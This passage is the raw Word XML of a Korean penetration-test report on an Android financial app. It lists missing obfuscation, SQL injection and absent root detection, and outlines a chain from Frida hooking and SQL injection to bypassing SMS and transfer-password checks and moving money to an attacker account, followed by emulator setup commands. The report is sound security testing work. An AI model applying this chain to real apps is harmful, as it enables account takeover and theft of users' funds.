      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006155BA" w:rsidRPr="007F3827" w:rsidRDefault="00845269" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="4" w:name="_Toc173402908"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="007F3827">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00E53860" w:rsidRPr="00E53860" w:rsidRDefault="00E53860" w:rsidP="00E53860">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:right="140"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8400" w:type="dxa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5760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E53860" w:rsidTr="00610E6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:lef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860" w:rsidRDefault="00E53860" w:rsidP="00E538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860" w:rsidRDefault="00E53860" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E53860" w:rsidTr="00E53860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860" w:rsidRPr="00AF452C" w:rsidRDefault="00E53860" w:rsidP="00E53860">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>코드난독화 미적용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860" w:rsidRDefault="00E53860" w:rsidP="00E53860">
            <w:pPr>
              <w:jc w:val="left"/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디컴파일 도구를 이용하여 앱 파일(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.apk)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을 쉽게 소스 코드 형태로 변환시킬 수 있기 때문에 취약점이 분석되거나 중요 정보 노출이 될 수 있다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E53860" w:rsidTr="00E53860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860" w:rsidRPr="00AF452C" w:rsidRDefault="00E53860" w:rsidP="00E53860">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>QL</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 인젝션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860" w:rsidRDefault="00E53860" w:rsidP="00E53860">
            <w:pPr>
              <w:jc w:val="left"/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 xml:space="preserve">사용자의 입력 값으로 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL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 xml:space="preserve"> 쿼리가 반환되는 취약점으로,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs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 xml:space="preserve">입력 값을 변조하여 비정상적인 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL 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쿼리를 조합하거나 실행하는 공격이다.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs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 xml:space="preserve">개발자가 생각지 못한 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL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문을 실행되게 함으로써 데이터베이스를 비정상적으로 조작 가능하다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E53860" w:rsidTr="00E53860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860" w:rsidRPr="00AF452C" w:rsidRDefault="009413C5" w:rsidP="00E53860">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">해킹 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">OS </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>탐지 적용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860" w:rsidRDefault="009413C5" w:rsidP="000E593B">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>루팅/탈옥된 단말에서 점검대상 앱 실행 시 정상 실행이 가능하다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EA0434" w:rsidRDefault="000E593B" w:rsidP="000E593B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[표 1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점과 간단한 설명</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069004F" w:rsidRPr="00E53860" w:rsidRDefault="00EA0434" w:rsidP="00EA0434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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006155BA" w:rsidRDefault="00BF3F9E" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc173402909"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>모의해킹 사용 도구</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00D62089" w:rsidRDefault="00D62089" w:rsidP="00C65AA7">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8400" w:type="dxa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5760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D62089" w:rsidTr="00610E6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:lef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9" w:rsidRDefault="00D62089" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>점검 도구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9" w:rsidRDefault="00D62089" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D62089" w:rsidTr="00610E6F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9" w:rsidRPr="00AF452C" w:rsidRDefault="00D62089" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>버프 스위트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9" w:rsidRDefault="00D62089" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>웹 애플리케이션 프록시 도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D62089" w:rsidTr="00AE587F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089" w:rsidRPr="00AF452C" w:rsidRDefault="00D62089" w:rsidP="00AE587F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>프리다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D44" w:rsidRPr="000777E6" w:rsidRDefault="00601D44" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000777E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>J</w:t>
            </w:r>
            <w:r w:rsidRPr="000777E6">
              <w:t>ava API를 통해 Android Java 런타임과의 상호 작용</w:t>
            </w:r>
            <w:r w:rsidRPr="000777E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>하며</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D62089" w:rsidRPr="000777E6" w:rsidRDefault="00D62089" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000777E6">
              <w:t>애플리케이션 동적 분석 도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D62089" w:rsidTr="00610E6F"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9" w:rsidRPr="00AF452C" w:rsidRDefault="00D62089" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF452C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>jadx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9" w:rsidRDefault="00D62089" w:rsidP="00610E6F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>APK 파일 디컴파일 도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C65AA7" w:rsidRPr="00D62089" w:rsidRDefault="000E593B" w:rsidP="000E593B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[표 2] </w:t>
      </w:r>
      <w:r w:rsidR="00BF3F9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의해킹 사용 도구</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF452C" w:rsidRDefault="00845269" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc173402910"/>
      <w:r w:rsidRPr="00643AC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구성도</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_heading=h.1t3h5sf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="006155BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF452C" w:rsidRDefault="00AF452C" w:rsidP="00C223A0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0082532B">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0874FA85" wp14:editId="0ABB81F5">
            <wp:extent cx="6120130" cy="3284855"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="107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52C" w:rsidRPr="00AF452C" w:rsidRDefault="00FE58BB" w:rsidP="007564D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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1.   </w:t>
      </w:r>
      <w:r w:rsidR="00AF452C" w:rsidRPr="00AF452C">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>후킹을 위한 모바일 기기 루팅, 프리다 설치 및 환경설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF452C" w:rsidRPr="00AF452C" w:rsidRDefault="00AF452C" w:rsidP="007564D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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF452C">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2.   프리다 후킹을 통해</w:t>
      </w:r>
      <w:r w:rsidR="00C266BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF452C">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQL 인젝션으로 사용자 정보 추출</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF452C" w:rsidRPr="00AF452C" w:rsidRDefault="00AF452C" w:rsidP="007564D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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF452C">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3.   탈취한 사용자 정보로 로그인 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF452C" w:rsidRPr="00AF452C" w:rsidRDefault="00AF452C" w:rsidP="007564D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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF452C">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4.   마이데이터 취약점을 이용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF452C" w:rsidRPr="00AF452C" w:rsidRDefault="00AF452C" w:rsidP="007564D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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF452C">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5.   마이데이터 sms 인증, 이체 비밀번호 우회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF452C" w:rsidRPr="00AF452C" w:rsidRDefault="00AF452C" w:rsidP="007564D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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF452C">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6.   공격자 계좌로 송금시켜 금전 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA2F96" w:rsidRPr="00451626" w:rsidRDefault="00103B7B" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc173402911"/>
      <w:r w:rsidRPr="00451626">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>모의해킹 결과</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="002A2F1E" w:rsidRPr="00176F06" w:rsidRDefault="00BF3F9E" w:rsidP="007F3827">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc173402912"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의해킹 절차</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="002C682B" w:rsidRPr="00176F06" w:rsidRDefault="002C682B" w:rsidP="001226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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_heading=h.1ci93xb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OOT</w:t>
      </w:r>
      <w:r w:rsidR="00122600">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>켜키</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C682B" w:rsidRPr="00F717F6" w:rsidRDefault="002C682B" w:rsidP="002C682B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F717F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>프리다 실행을 위한 루팅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F717F6" w:rsidRPr="00F717F6" w:rsidRDefault="002C682B" w:rsidP="00F717F6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F717F6">
        <w:rPr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15072A" wp14:editId="33C0A1C9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3722370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>325755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="243840" cy="274320"/>
                <wp:effectExtent l="19050" t="1905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4B173" id="직사각형 3" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:293.1pt;margin-top:25.65pt;width:19.2pt;height:21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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F717F6">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251888640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="000B7976" wp14:editId="533F4463">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>319601</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4679315" cy="1508760"/>
            <wp:effectExtent l="0" t="0" r="6985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003" b="79579"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4680000" cy="150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7F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">녹스 시스템 설정 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F717F6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F717F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>일반 탭 -&gt; ROOT 켜기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176F06" w:rsidRPr="00176F06" w:rsidRDefault="002C682B" w:rsidP="00176F06">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="400"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2F5D5D" wp14:editId="5D1D8044">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2139950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2590107</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="678180" cy="198120"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="1143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0490" id="직사각형 11" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:168.5pt;margin-top:203.95pt;width:53.4pt;height:15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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00E76EFA">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251889664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41BE068D" wp14:editId="320E205F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1861185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4680000" cy="3922191"/>
            <wp:effectExtent l="0" t="0" r="6350" b="254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42" t="8161" r="21216" b="7351"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4680000" cy="39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BB5"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Pr="006C1BB5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6717D6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1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1BB5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Pr="006C1BB5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시스템 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C682B" w:rsidRDefault="002C682B" w:rsidP="002C682B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6717D6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2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일반 탭에서 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>ROOT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켜기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C682B" w:rsidRPr="002C682B" w:rsidRDefault="002C682B" w:rsidP="002C682B">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667E98" w:rsidRPr="00667E98" w:rsidRDefault="00460E5B" w:rsidP="00667E9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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>프리다 서버 실행</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblpPr w:leftFromText="142" w:rightFromText="142" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="29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741926" w:rsidTr="006717D6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00741926" w:rsidRPr="00D92DA3" w:rsidRDefault="00741926" w:rsidP="006717D6">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:snapToGrid/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Cs w:val="20"/>
              </w:rPr>
              <w:t>녹스 연결</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00741926" w:rsidTr="006717D6">
        <w:trPr>
          <w:trHeight w:val="140"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00741926" w:rsidRPr="003A6296" w:rsidRDefault="00741926" w:rsidP="006717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</w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>adb connect 127.0.0.1:62001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00667E98" w:rsidRDefault="00741926" w:rsidP="00667E9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 w:rsidRPr="00741926">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="527AAFAC" wp14:editId="47B23E43">
            <wp:extent cx="5756910" cy="8382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 r="1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5782377" cy="84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42" w:rightFromText="142" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="519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67E98" w:rsidTr="00667E98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
          </w:tcPr>
          <w:p w:rsidR="00667E98" w:rsidRPr="00D92DA3" w:rsidRDefault="00667E98" w:rsidP="00667E98">
            <w:pPr>
              <w:pStyle w:val="a8"/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:snapToGrid/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Cs w:val="20"/>
              </w:rPr>
              <w:t>프리다 서버  저장 위치로 이동 및 권한 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00667E98" w:rsidTr="00667E98">
        <w:trPr>
          <w:trHeight w:val="431"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00667E98" w:rsidRPr="00741926" w:rsidRDefault="00667E98" w:rsidP="00667E9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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="맑은 고딕"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>adb shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00667E98" w:rsidTr="00667E98">
        <w:trPr>
          <w:trHeight w:val="456"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9071" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
